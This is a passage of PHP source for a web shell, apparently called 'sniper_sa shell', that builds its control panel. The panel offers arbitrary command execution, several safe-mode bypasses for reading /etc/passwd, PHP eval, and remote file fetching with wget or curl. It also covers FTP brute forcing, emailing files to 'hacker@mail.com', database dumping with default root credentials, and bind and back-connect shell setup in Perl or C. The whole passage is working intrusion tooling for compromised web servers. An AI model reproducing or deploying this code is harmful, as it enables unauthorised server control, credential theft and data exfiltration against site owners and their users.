echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text208'],'id15').$table_up2.div('id15').$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select name=\"method\">
<option value=\"system\" <? if ($method==\"system\") { echo \"selected\"; } ?>system</option>
<option value=\"passthru\" <? if ($method==\"passthru\") { echo \"selected\"; } ?>passthru</option>
<option value=\"exec\" <? if ($method==\"exec\") { echo \"selected\"; } ?>exec</option>
<option value=\"shell_exec\" <? if ($method==\"shell_exec\") { echo \"selected\"; } ?>shell_exec</option>
<option value=\"popen\" <? if ($method==\"popen\") { echo \"selected\"; } ?>popen</option>
<option value=\"proc_open\" <? if ($method==\"proc_open\") { echo \"selected\"; } ?>proc_open</option>
</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text3'].$arrow."</b>".in('text','command',54,(!empty($_POST['command'])?($_POST['command']):("id"))).in('hidden','cmd',0,'command').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text223'],'id5').$table_up2.div('id5').$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select name=\"method\">
<option value=\"file\" <? if ($method==\"file\") { echo \"selected\"; } ?> file</option>
<option value=\"fread\" <? if ($method==\"fread\") { echo \"selected\"; } ?> fread</option>
<option value=\"show_source\" <? if ($method==\"show_source\") { echo \"selected\"; } ?> show_source</option>
<option value=\"readfile\" <? if ($method==\"readfile\") { echo \"selected\"; } ?> readfile</option>
</select>".in('hidden','file',0,$dir).ws(2)."<b>".$lang[$language.'_text202'].$arrow."</b>".in('text','file',41,'/etc/passwd').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>");
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysqlb').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text220'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','sym1p2',50,(!empty($_POST['sym1p2'])?($_POST['sym1p']):("/../../../"))).in('text','sym1p',50,(!empty($_POST['sym1p'])?($_POST['sym1p']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text222'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
{
echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id23').$table_up2.div('id23').$ts;
echo sr(15,"<b>".$lang[$language.'_text205'].$arrow."</b>",in('text','log',96,(!empty($_POST['log'])?($_POST['log']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'تم زرع الشل وبإمكانك استخدامه filename.php?ss=http://shell.txt?').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id11').$table_up2.div('id11').$ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
echo $table_up1.div_title($lang[$language.'_text211'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text212']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','php_ini1',10,'php.ini').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','file_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text221'],'id15').$table_up2.div('id15').$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','funzip',78,"$dir/file"));
echo sr(15,"<b>".$lang[$language.'_text65'].$arrow."</b>",in('text','fzip',105,"$dir/sploitz.zip").ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text219'],'id15').$table_up2.div('id15').$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','filefrom',78,'http://website.com/file.txt'));
echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('text','fileto',105,filename_.php).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
$aliases2 = '';
foreach ($aliases as $alias_name=>$alias_cmd)
{
$aliases2 .= "<option>$alias_name</option>";
}
echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode){
echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode && $unix){
echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode){
echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;
if(!$safe_mode && $unix){
echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"sniper_sa.php\");\r\n//readfile(\"/etc/passwd\");"));
echo "</textarea>";
echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
echo "</div></div></font>";
echo $table_end1.$fe;
if($safe_mode&&$curl_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&$mssql_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&$unix&&function_exists('mb_send_mail')){
echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&function_exists('imap_list')){
echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&function_exists('imap_body')){
echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if(@ini_get('file_uploads')){
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
if(!$safe_mode&&$unix){
echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
$arh = $lang[$language.'_text92'];
if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo $te.'</div>'.$table_end1.$fe;
if(@function_exists("ftp_connect")){
echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
echo $te."</td>".$fe."</tr></div></table>";
}
if($unix && @function_exists("ftp_connect")){
echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
echo $te.'</div>'.$table_end1.$fe;
}
if(@function_exists("mail")){
echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from sniper_sa shell"))));
echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
echo $te."</td>".$fe."</tr></div></table>";
}
if($mysql_on||$mssql_on||$pg_on||$ora_on)
{
$select = '<select name=db>';
if($mysql_on) $select .= '<option>MySQL</option>';
if($mssql_on) $select .= '<option>MSSQL</option>';
if($pg_on) $select .= '<option>PostgreSQL</option>';
if($ora_on) $select .= '<option>Oracle</option>';
$select .= '</select>';
echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
}
if(!$safe_mode&&$unix){
echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'9999'));
echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'SnIpEr'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'80'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'80'));
